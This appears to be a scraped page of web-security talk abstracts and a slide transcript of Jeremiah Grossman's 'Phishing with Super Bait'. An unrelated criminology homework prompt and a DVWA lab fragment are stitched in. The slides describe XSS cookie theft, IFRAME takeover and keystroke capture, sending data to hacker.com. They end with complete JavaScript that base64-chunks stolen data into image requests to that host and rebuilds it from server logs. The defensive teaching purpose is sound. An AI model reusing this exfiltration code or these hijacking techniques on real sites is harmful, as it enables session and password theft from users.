Phishing with Super Bait
Jeremiah Grossman, Founder and CTO, WhiteHat Security
The use of phishing/cross-site scripting (XSS) hybrid attacks for financial gain is spreading. It's imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information.
This isn't just another presentation about phishing scams or cross-site scripting. We're all very familiar with each of those issues. Instead, we'll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help.
By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks.
Your users are almost certainly vulnerable in one way or another. Mike North explores a series of common web app security pitfalls, first demonstrating how to exploit the vulnerability and then recommending a pragmatic and effective defense against the attack. Buckle up, because Mike's about to take some things you love and depend on and smash them to bits.
Web Application Security: The Land that Information Security Forgot, by Jeremiah Grossman
Today, the vast majority of those within information security have heard about web application security and possess at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.
Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".
This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.
Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah designed, audited, and penetration-tested the huge company's web applications, which demand the highest security.
During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.
Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and is considered to be among the foremost web security experts.
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Cross-Site Request Forgery (CSRF for short) is a kind of web application vulnerability which allows a malicious website to send unauthorized requests to a vulnerable website using the active session of one of its authorized users.
In simple words, it's when an "evil" website posts a new status to your Twitter account during your visit, while your login session on Twitter is still active.
For security reasons, the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content.
As browser configurations may be modified, the best way to protect a web application against CSRF is to secure the web application itself.
Top Ten Web Hacking Techniques of 2008:
"What's possible, not probable"
The polls are closed, the votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce, with the newest and most innovative web hacking techniques put to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.
BEST PRACTICES OF WEB APPLICATION SECURITY, by Samvel Gevorgyan
"Web Application Security is a vast topic and time is not enough to cover all kinds of malicious attacks and techniques for avoiding them, so now we will focus on the top 10 high-level vulnerabilities. Web developers work in different ways using their custom libraries and intruder prevention systems, and now we will see what they should do and should not do based on best practices."
- Samvel Gevorgyan
[ Presentation on Scribd ]
http://www.scribd.com/doc/47157267
A presentation and class delivered to a PHP developer group at Brown University. It discussed web application security with a heavy emphasis on PHP, covered security in the SDLC, and showed with examples what to do and what not to do.
Content Management System Security.
How to secure your CMS?
Common rules:
+ Choose your CMS with both functionality and security in mind
+ Update with urgency
+ Use a strong password (admin dashboard access, database users, etc.)
+ Have a firewall in place (detect or prevent suspicious requests)
+ Keep track of the changes to your site and their source code
+ Give the user permissions (and their levels of access) a lot of thought
+ Limit the type of files to non-executables and monitor them closely
+ Backup your CMS (daily backups of your files and databases)
+ Uninstall plugins you do not use or trust.
http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/
Recorded Webinar: https://www.whitehatsec.com/webinar/whitehat_webinar_march2713.html
Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivalents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack. Now in its seventh year, the Top Ten Web Hacking Techniques list encourages information sharing, provides a centralized knowledge base, and recognizes researchers who contribute excellent work. Past Top Tens and the number of new attack techniques discovered in each year:
Understanding WordPress Security (wwc-4-7-17), by Nicholas Batik
WordPress is a powerful tool for presenting your information on the web, but with great power comes great responsibility – and great targets for people with various criminal intentions. This presentation illustrates some of the risks and ways to mitigate them.
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation will:
1. Explain how XPC/NSXPC work
2. Present some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3. Abuse an interesting feature on Catalina that allows injecting an unsigned dylib
4. Show you how to finally fix that vulnz!
Reading this slide deck can help you understand the web server security challenges and the different ways to mitigate them and keep your web server secure. If this slide deck is helpful to you, please acknowledge me by donating to charity. Thanks
When and why to stray from Chrome, Edge, or Firefox, some programs and extensions to support your Internet experience, and the increasing complexity of the dangers of going online.
Ransomware is a type of malicious software that blocks access to data or threatens to publish it until a ransom is paid. Simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse. More advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. Also covers ransomware attacks of 2017.
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends in web-based malware. Technology and insecurity go hand in hand. With the advent of new attacks and techniques, the distribution of malware through the web has increased tremendously. Browser-based exploits, mainly against Internet Explorer, have given birth to a new world of malware infection. Attackers spread malware elegantly by exploiting vulnerabilities and through drive-by downloads. Infection strategies adopted by attackers include malware distribution through IFRAME injections and search engine optimization. In order to understand the intrinsic behavior of this web-based malware, a thorough analysis is required to understand the logic working behind it. It is necessary to dissect this malware from bottom to top in order to control its devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware, including PCAP analytics. Demonstrations will prove the necessity of web malware analysis.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During this session, Jeremiah will cover the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today's corporate websites, learning real-world solutions to today's web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Continuing in your role as a human service provider for your local.docx, by richardnorman90310
Continuing in your role as a human service provider for your local community, your manager has asked you to write an opinion piece for the local newspaper discussing gaps in prison and jail services in their state.
Write an opinion article that is 900 words. Complete the following in your article:
· Describe the major beliefs of 4 criminological theories.
· For each criminological theory, explain what human services should be provided to inmates.
· Of the services identified for each criminological theory, list the services that are not currently provided by your local or state agencies.
· Discuss your personal beliefs related to which human services should be provided by your local or state agencies.
· Discuss a conclusion focused on changes in human services you would like to see made by your local or state agencies.
Lab-8: Web Hacking
Websites have always been among the first targets of hackers. There are many reasons for this. These are the most important ones:
1) Websites have to be reachable from the Internet. Their primary purpose is to publish something or provide some service for the public
2) There are more than 1 billion websites as almost every organization, and many individuals have websites
3) As opposed to the earlier years of the world wide web, websites are very dynamic today. They come with forms and dynamic applications implemented by many different frontend and backend technologies. A wide variety of dynamic applications not only bring more functionality to web applications but also introduces vulnerabilities.
As a result, we are talking about something valuable that is billions in amount, accessible by anybody, and a commonplace for wrong implementation and vulnerabilities.
Section-1: Exploit Cross-Site Scripting (XSS) Vulnerability
An XSS attack enables malicious users to inject client-side scripts such as JavaScript codes into web pages viewed by other users. The term XSS is used to describe both the vulnerability and the attack type, such as XSS attack / XSS vulnerability on the web application.
1) Log into Windows 7 Attacker on the Netlab environment.
2) Open Firefox by clicking the icon on the desktop or start menu
3) Visit this page
http://192.168.2.15/dvwa/login.php
This is the "Damn Vulnerable Web Application" hosted on the OWASP BWA machine on Netlab.
4) Log in to the web application by typing user as Username and user as Password. After logging in, you will see the page below.
5) Click on "XSS reflected" in the left menu and type your nickname into the text box in the right pane of the webpage. (I typed "ethical" and clicked the submit button.) The web application takes what you typed as the input, adds "Hello" to the beginning, and prints it to the screen.
6) Try some basic HTML tags now. Type
<h1>your nickname</h1>
I typed "<h1>ethical</h1>" and then clicked the submit button. I confirm.
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
There is a serious misalignment of interests between Application Security vulnerability assessment vendors and their customers. Vendors are incentivized to report everything they possibly can, even issues that rarely matter. On the other hand, customers just want the vulnerability reports that are likely to get them hacked. Every finding beyond that is a waste of time, money, and energy, which is precisely what's happening every day.
How to Determine Your Attack Surface in the Healthcare Sector, by Jeremiah Grossman
Do you know what an asset inventory is, why it's important, and how it can protect you from cybersecurity vulnerabilities?
In this webinar, you can expect to learn:
- How to prepare yourself and your staff against cybersecurity threats
- What an asset inventory is and why it's the next big thing in information security
- How to identify all your company's Internet-connected assets and which need to be defended
- Why keeping an up-to-date asset inventory is important
- How to obtain your own attack surface map
Exploring the Psychological Mechanisms used in Ransomware Splash Screens, by Jeremiah Grossman
The present study examined a selection of 76 ransomware splash screens collected from a variety of sources. These splash screens were analysed according to surface information, including aspects of visual appearance, the use of language, cultural icons, payment and payment types. The results from the current study showed that, whilst there was a wide variation in the construction of ransomware splash screens, there was a good degree of commonality, particularly in terms of the structure and use of key aspects of social engineering used to elicit payment from the victims. There was the emergence of a sub-set of ransomware that, in the context of this report, was termed ‘Cuckoo’ ransomware. This type of attack often purported to be from an official source requesting payment for alleged transgressions.
What the Kidnapping & Ransom Economy Teaches Us About Ransomware, by Jeremiah Grossman
Ransomware is center stage, as campaigns are practically guaranteed financial gain. Cyber-criminals profit hundreds of millions of dollars by selling our data back to us. If you look closely, the ransomware economic dynamics closely follow the real-world kidnapping and ransom industry. We’ll explore the eerie similarities, where ransomware is headed, and strategies we can bring to the fight.
In the past two decades of tech booms, busts, and bubbles, two things have not changed - hackers are still finding ways to breach the security measures in place, and the endpoint remains the primary target. And now, with cloud and mobile computing, endpoint devices have become the new enterprise security perimeter, so there is even more pressure to lock them down.
Companies are deploying piles of software on the endpoint to secure it - antivirus, anti-malware, desktop firewalls, intrusion detection, vulnerability management, web filtering, anti-spam, and the list goes on. Yet with all of the solutions in place, high-profile companies are still being breached. The recent attacks on large retail and hospitality organizations are prime examples, where hackers successfully used credit-card-stealing malware targeting payment servers to collect customer credit card information.
Ransomware is Here: Fundamentals Everyone Needs to Know, by Jeremiah Grossman
If you’re an IT professional, you probably know at least the basics of ransomware. Instead of using malware or an exploit to exfiltrate PII from an enterprise, bad actors instead find valuable data and encrypt it. Unless you happen to have an NSA-caliber data center at your disposal to break the encryption, you must pay your attacker in cold, hard bitcoins—or else wave goodbye to your PII. Those assumptions aren’t wrong, but they also don’t tell the whole picture.
During this event we’ll discuss topics such as:
Why Ransomware is Exploding
The growth of ransomware, as opposed to garden-variety malware, is enormous. Hackers have found that they can directly monetize the data they encrypt, which eliminates the time-consuming process of selling stolen data on the Darknet. In addition, the use of ransomware requires little in the way of technical skill—because attackers don’t need to get root on a victim’s machine.
Who the Real Targets Are
Two years ago, the most newsworthy victims of ransomware were various police departments. This year, everyone is buzzing about hospitals. Is this a deliberate pattern? Probably not. Enterprises are so ill-prepared for ransomware that attackers have a green field to wreak havoc. Until the industry shapes up, bad actors will target ransomware indiscriminately.
Where Ransomware Stumbles
Although ransomware is nearly impossible to dislodge when employed correctly, you may be surprised to find that not all bad actors have the skill to do it. Even if ransomware targets your network, you may learn that your attackers have used extremely weak encryption—or that they’ve encrypted files that are entirely non-critical.
As far as ransomware is concerned, forewarned is forearmed. Once you know how attackers deliver ransomware, who they’re likely to attack, and the weaknesses in the ransomware deployment model, you’ll be able to understand how to protect your enterprise.
This year WhiteHat Security™ celebrates its fifteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat Sentinel™ service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.
Where Flow Charts Don't Go -- Website Security Statistics Report (2015), by Jeremiah Grossman
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they can most efficiently defend their websites, gain visibility into the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well-known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security's expert analysis and recommendations.
No More Snake Oil: Why InfoSec Needs Security Guarantees, by Jeremiah Grossman
Ever notice how everything in InfoSec is sold “as is”? No guarantees, no warrantees, no return policies. For some reason in InfoSec, providing customers with a form of financial coverage for their investment is seen as gimmicky, but the tides and times are changing. This talk discusses use cases on why guarantees are a must have and how guarantees benefit customers as well as InfoSec as a whole.
In this report, we put this area of application security understanding to the test by measuring how various web programming languages and development frameworks actually perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that the most popular modern languages and frameworks yield similar results in production websites?
By analyzing the vulnerability assessment results of more than 30,000 websites under management with WhiteHat Sentinel, we begin to answer these questions. These answers may enable the application security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas. Software vendors may focus on areas that are found to be lacking. Developers can increase their familiarity with the strengths and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and must be virtually transparent. Only then will application security progress be made.
http://blackhat.com/us-13/briefings.html#Grossman
Online advertising networks can be a web hacker’s best friend. For mere pennies per thousand impressions (that means browsers) there are service providers who allow you to broadly distribute arbitrary javascript -- even malicious javascript! You are SUPPOSED to use this “feature” to show ads, to track users, and get clicks, but that doesn’t mean you have to abide. Absolutely nothing prevents spending $10, $100, or more to create a massive javascript-driven browser botnet instantly. The real-world power is spooky cool. We know, because we tested it… in-the-wild.
With a few lines of HTML5 and JavaScript code we’ll demonstrate just how you can easily commandeer browsers to perform DDoS attacks, participate in email spam campaigns, crack hashes and even help brute-force passwords. Put simply, instruct browsers to make HTTP requests they didn’t intend, even something as well-known as Cross-Site Request Forgery. With CSRF, no zero-days or malware are required. Oh, and there is no patch. The Web is supposed to work this way. Also nice, when the user leaves the page, our code vanishes. No traces. No tracks.
Before leveraging advertising networks, the reason this attack scenario didn’t worry many people is because it has always been difficult to scale up, which is to say, simultaneously control enough browsers (aka botnets) to reach critical mass. Previously, web hackers tried poisoning search engine results, phishing users via email, link spamming Facebook, Twitter and instant messages, Cross-Site Scripting attacks, publishing rigged open proxies, and malicious browser plugins. While all useful methods in certain scenarios, they lack simplicity, invisibility, and most importantly -- scale. That’s what we want! At a moment’s notice, we will show how it is possible to run javascript on an impressively large number of browsers all at once and no one will be the wiser. Today this is possible, and practical.
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new Web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they can most efficiently defend their websites, gain visibility into the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom Web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well-known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security’s expert analysis and recommendations.
Through its Software-as-a-Service (SaaS) offering, WhiteHat Sentinel, WhiteHat Security is uniquely positioned to deliver the depth of knowledge that organizations require to protect their brands, attain compliance, and avert costly breaches.
WhiteHat Security, the Web security company, today released the twelfth installment of the WhiteHat Security Website Security Statistics Report. The report reviewed serious vulnerabilities* in websites during the 2011 calendar year, examining the severity and duration of the most critical vulnerabilities from 7,000 websites across major vertical markets. Among the findings in the report, WhiteHat research suggests that the average number of serious vulnerabilities found per website per year in 2011 was 79, a substantial reduction from 230 in 2010 and down from 1,111 in 2007. Despite the significant improvement in the state of website security, organizational challenges in creating security programs that balance breadth of coverage and depth of testing leave large-scale attack surfaces or small, but very high-risk vulnerabilities open to attackers.
The report examined data from more than 7,000 websites across over 500 organizations that are continually assessed for vulnerabilities by WhiteHat Security’s family of Sentinel Services. This process provides a real-world look at website security across a range of vertical markets, including findings from the energy and non-profit verticals for the first time this year. The metrics provided serve as a foundation for improving enterprise application security online.
1. Phishing with Super Bait
Jeremiah Grossman
WhiteHat Security
Founder and Chief Technology Officer
2. Who am I?
Day Job:
Technology R&D and industry evangelist
Frequent Black Hat and industry speaker
Author of several web security articles/white papers
Night Job:
Founder of the Web Application Security Consortium (WASC)
www.webappsec.org
Past Job:
Yahoo Information Security Officer
3. WhiteHat Security
Real-World Solutions for Web Application Security
WhiteHat Security is a leading provider of web application security services. WhiteHat delivers comprehensive, easy-to-use, cost-effective solutions that enable companies to secure valuable customer data, meet compliance standards, and maintain brand integrity.
4. Discussion Topics
Current Web Security Models
Phishing and Cross-Site Scripting (XSS)
XSS-Phishing Hybrid Attacks
Next Generation XSS Attacks
Best-Practices
5. Current Web Security Models
Secure Sockets Layer (SSL)
Web Browser Security
Two-Factor Authentication
6. Secure Sockets Layer (SSL)
Encrypts data between the client and server while in transit. Verifies the identity of the server and/or the client.
(Anyone actually look at the certificates?)
SSL does NOT make a website secure! It protects the channel, not the application: an XSS payload travels over the same encrypted connection as everything else.
7. Browser Security: Same-Origin Policy
“The same origin policy prevents documents or scripts loaded from one origin from getting or setting properties of a document from a different origin.”
http://www.mozilla.org/projects/security/components/same-origin.html
[Diagram: http://domain1.com/index.html accessing a second origin; standard permission is OK for the same origin, Deny with an access-denied error message for a different origin]
8. Two-Factor Authentication
Online Banks, AOL, and others will begin rolling out this type of solution. More organizations will follow this trend.
Compromising passwords and/or accounts is more difficult when using two-factor authentication. Tokens protect against several types of attacks, including forms of phishing and spyware, but they are not a cure-all. In particular, a token does nothing once an attacker's script is already running inside the authenticated session, which is exactly what XSS provides.
Bruce Schneier Blog: The Failure of Two-Factor Authentication
“Two-factor authentication isn't our savior. It won't defend against phishing. It's not going to prevent identity theft. It's not going to secure online accounts from fraudulent transactions. It solves the security problems we had ten years ago, not the security problems we have today.”
http://www.schneier.com/blog/archives/2005/03/the_failure_of.html
9. The Phishing Scam
High-Tech version of the age-old confidence scam
“Phishing attacks use both social engineering and technical subterfuge to steal consumers' personal identity data and financial account credentials. Social engineering schemes use 'spoofed' e-mails to lead consumers to counterfeit websites designed to trick recipients into divulging financial data such as credit card numbers, account usernames, passwords and social security numbers. Hijacking brand names of banks, e-retailers and credit card companies, phishers often convince recipients to respond.”
Anti-Phishing Working Group
10. The Common Approach
[Diagram] Attacker contacts a user with a forged email message pointing at a fake copy of the real website. The user fills out the form on the fake website. PROFIT!
11. Other Methods of
Communication
Email
Instant Messages
Message Boards
Guestbooks
Blog Comments
Viruses, Trojan Horses, Spyware
etc.
12. Phishing Activity Trends Report
January 2005
The Anti-Phishing Working Group (APWG)
http://www.antiphishing.org/
Number of active phishing sites reported: 2560
Average monthly growth rate in phishing sites Jul-Jan: 28%
Number of brands hijacked by phishing in January: 64
Average time online for site: 5.8 (days)
Longest time online for site: 31 days
13. Cross-Site Scripting (XSS)
Targets the user, not the website
JavaScript is what makes XSS really bad (very powerful language)
Most commonly found web vulnerability
Impact generally underestimated or misunderstood
OWASP TOP-10 (A4): http://www.owasp.org/documentation/topten/a4.html
CERT Malicious HTML Tags: http://www.cert.org/advisories/CA-2000-02.html
Web Security Threat Classification: http://www.webappsec.org/threat.html
Gunter Ollmann: http://www.technicalinfo.net/papers/CSS.html
The Cross-Site Scripting FAQ: http://www.cgisecurity.com/articles/xss-faq.shtml
14. JavaScript DOM Access
JavaScript has complete access to the DOM and is capable of doing just about anything. But what is anything?
Possible To:
Alter the content of news articles
Change the ACTION attribute of HTML Forms
etc, etc, etc.
Very hard for user to detect
15. Type 1 (Direct Echo)
Most common variety of XSS
Requires the victim to click a link to be exploited
When the victim clicks and the JavaScript code executes, it does so in the context of the victim domain.
[Diagram] Attacker sends user an email containing a specially crafted link. The link has a hostname of the victim website domain, looking legitimate, and is laced with embedded JavaScript code. When the user clicks the link...
http://victim.com/foo.cgi?q=<html_javascript_exploit_code>...
...the cookies are sent off-domain to http://hacker.com/ using an image object request. The attacker retrieves the cookies from the web server logs, where they can be used to hi-jack the user's session.
16. Type 2 (HTML Injection)
Most dangerous variety of XSS
Does not require a user click, just a visit to a web page
Commonly found in HTML E-Mail, Message Boards, and Blog posts
[Diagram] User clicks to view an email message sent by an attacker. The email message contains JavaScript exploit code. When the user loads the page...
http://victim.com/foo.cgi?q=<html_javascript_exploit_code>...
...the cookies are sent to http://hacker.com/. The attacker retrieves the cookies from the web server logs, where they can be used to hi-jack the user's session.
Same attack, but the requirements are less.
17. XSS Can Be Used To...
Steal cookies and hi-jack sessions
Execute unintended website functionality
Harass users with malicious code
Alter any portion of the web page
Deface or DoS the website
Violate the same-origin policy
Aid in Phishing scams...
18. XSS-Phishing Hybrid Attack
The genie is out of the bottle
Google Plugs Cookie-Theft Data Leak
http://www.eweek.com/article2/0,1759,1751689,00.asp
eBay Redirect Becomes Phishing Tool
http://www.betanews.com/article/eBay_Redirect_Becomes_Phishing_Tool/1109886753
A phishing wolf in sheep's clothing
http://news.com.com/2100-7349_3-5616419.html
Online Banking Industry Very Vulnerable to Cross-Site Scripting Frauds
http://news.netcraft.com/archives/2005/03/11/online_banking_industry_very_vulnerable_to_crosssite_scripting_frauds.html
Here's one more trick up hackers' sleeves
http://reviews.cnet.com/4520-3513_7-5021212.html
19. Hybrid Variants
Leveraging the target domain to convince the victim of
legitimacy
Attack Types:
XSS Redirect Disguise
XSS Page Re-writing
20. XSS Redirect Disguise
Phishing Activity Trends Report - January 2005
Cross-Site Scripting / Redirects
“During the month of January, Websense Security saw a number of attacks using cross-site scripting to redirect URL’s from popular web sites in order to better present themselves and as a means to prevent blocking. An example of this is an attack that was discovered utilized the Lycos search engine. By crafting a URL, the hacker can redirect any end user through Lycos directory to their fraudulent page. An example is below:
http://r.lycos.com/r/BJTWQSAUE/http://www.websensesecuritylabs.com
This link will automatically send the end user to Lycos, which in turn redirects the
21. XSS Redirect Disguise
[Diagram] Attacker sends user an email containing a specially crafted link. The link has a hostname of the victim website domain, to appear legitimate, and has an embedded redirect URL. When a user clicks the link, the browser is re-directed to the injected URL.
http://victim.com/redirect.cgi?url=http://www.bofa.com
Fake website at http://hacker.com/: the URL doesn't look right, but is the user looking?
Simple. Effective.
22. XSS Page-Rewriting
This is a highly convincing and dangerous issue
We should be seeing more of this attack in the near future
Leverages XSS Type 1 (Direct Echo)
[Diagram] JavaScript can alter just about any aspect of a web page. It is possible to change the location an HTML Form POSTs to, while the URL remains looking legitimate.
http://victim.com/webapp.cgi?url=<html_javascript_exploit_code>...
The form is re-pointed at http://hacker.com/. The attacker retrieves the cookies from the web server logs, where they can be used to hi-jack the user's session.
23. Next Generation XSS Attacks
Moving beyond simple garden variety XSS exploits to
explore what is truly possible
Several concepts based on...
XSS-Proxy
“An advanced Cross-Site-Scripting (XSS) attack
tool”
Developer: Anton Ranger
http://xss-proxy.sourceforge.net/
24. Current XSS Limitations
Victim-Attacker connection is not persistent. Once the user clicks, the attacker loses control.
Off-domain data transfer mechanism is only one-way: victim to attacker.
25. Goals of XSS Exploitation
Persistent remote communication with the browser, even
if the user clicks around on the website
Complete control over the web browser and environment
Monitor several XSS'ed clients simultaneously
As invisible as possible
Circumvent all previously described security models
26. XSS Remote Control
A user is cross-site scripted and third-party JavaScript exploit code performs the following...
Empties the contents of the current window.
Creates a full-screen IFRAME with the SRC attribute equal to the URL of the current page. To the user, nothing has been visibly affected and they continuously click within the IFRAME.
Whenever a link is clicked, the web page contents are sent to an off-domain server.
Keystroke recording is enabled, capturing any text entered into HTML form fields, including usernames and passwords.
27. Monitoring the Viewport
An IFRAME is an HTML tag used to include one web page within another. The IFRAME is created to be displayed full-screen, so that any clicks occur within its borders. Since the exploit code is loaded from the same domain as the IFRAME, it has full access to the DOM.
28. Data Capturing
Saving the data: JavaScript saves data from the DOM including HTML, cookies, User-Agent, and keystrokes.
29. Data Transferring
Transferring large amounts of data while bypassing the same-origin policy
Split the data into blocks. 2,000 bytes is large enough without exceeding browser URL length limits. Base64 encode the blocks before transit; encoding ensures the data is not altered by the browser. Data blocks are transferred individually with multiple off-domain GET requests using JavaScript image objects.
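The block-and-encode scheme on this slide, written out as an added example (it is not code from the talk or from XSS-Proxy). The drop URL http://hacker.com/x, the s/n/t/d parameter names and the access-log format are assumptions made for the demonstration; in a browser the sender callback would be `(url) => { new Image().src = url; }`, which is what lets the request leave the origin without any XMLHttpRequest.

```javascript
// Added example: chunked, base64-encoded exfiltration over image GET requests,
// plus the attacker-side reassembly from web server logs. Not from the slides.

const BLOCK_SIZE = 2000; // bytes per block, the figure quoted on the slide
const DROP_URL = 'http://hacker.com/x'; // attacker's collection endpoint (assumed)

// Base64 as a browser would do it with btoa(); Buffer keeps this runnable in Node.
function b64encode(bytes) { return Buffer.from(bytes).toString('base64'); }
function b64decode(text) { return Buffer.from(text, 'base64'); }

// Build the off-domain URLs that carry one session's captured data.
// sessionId ties the blocks together; n/t let the receiver reorder them,
// because image requests complete in no particular order.
function buildExfilUrls(data, sessionId, blockSize = BLOCK_SIZE) {
  const bytes = Buffer.from(data, 'utf8');
  const total = Math.ceil(bytes.length / blockSize);
  const urls = [];
  for (let seq = 0; seq < total; seq++) {
    const block = bytes.subarray(seq * blockSize, (seq + 1) * blockSize);
    const params = new URLSearchParams({
      s: sessionId, n: String(seq), t: String(total), d: b64encode(block),
    });
    urls.push(`${DROP_URL}?${params.toString()}`);
  }
  return urls;
}

// Victim side: fire one request per block through the supplied sender.
function exfiltrate(data, sessionId, send) {
  const urls = buildExfilUrls(data, sessionId);
  urls.forEach(send);
  return urls.length;
}

// Attacker side: rebuild the data from access-log lines ("GET /x?... HTTP/1.1").
// Returns null until every block of the session has arrived.
function reassembleFromLog(logLines, sessionId) {
  const blocks = new Map();
  let total = null;
  for (const line of logLines) {
    const m = line.match(/GET (\S+)/);
    if (!m) continue;
    const p = new URL(m[1], 'http://hacker.com').searchParams;
    if (p.get('s') !== sessionId) continue;
    total = Number(p.get('t'));
    blocks.set(Number(p.get('n')), b64decode(p.get('d')));
  }
  if (total === null || blocks.size !== total) return null;
  const ordered = Array.from({ length: total }, (_, i) => blocks.get(i));
  return Buffer.concat(ordered).toString('utf8');
}

// Constructed demo input: ~6.8 KB of "captured" cookie text, i.e. four blocks.
const CAPTURED = 'document.cookie=SESSIONID=abc123; '.repeat(200);
const sentUrls = [];
exfiltrate(CAPTURED, 'v1', (url) => sentUrls.push(url));

// Constructed access-log lines, reversed to show that order does not matter.
const LOG = sentUrls
  .map((u) => {
    const parsed = new URL(u);
    return `10.0.0.7 - - [14/Mar/2005:10:00:00] "GET ${parsed.pathname}${parsed.search} HTTP/1.1" 200 43`;
  })
  .reverse();

console.log('blocks sent:', sentUrls.length,
  'reassembled OK:', reassembleFromLog(LOG, 'v1') === CAPTURED);
```

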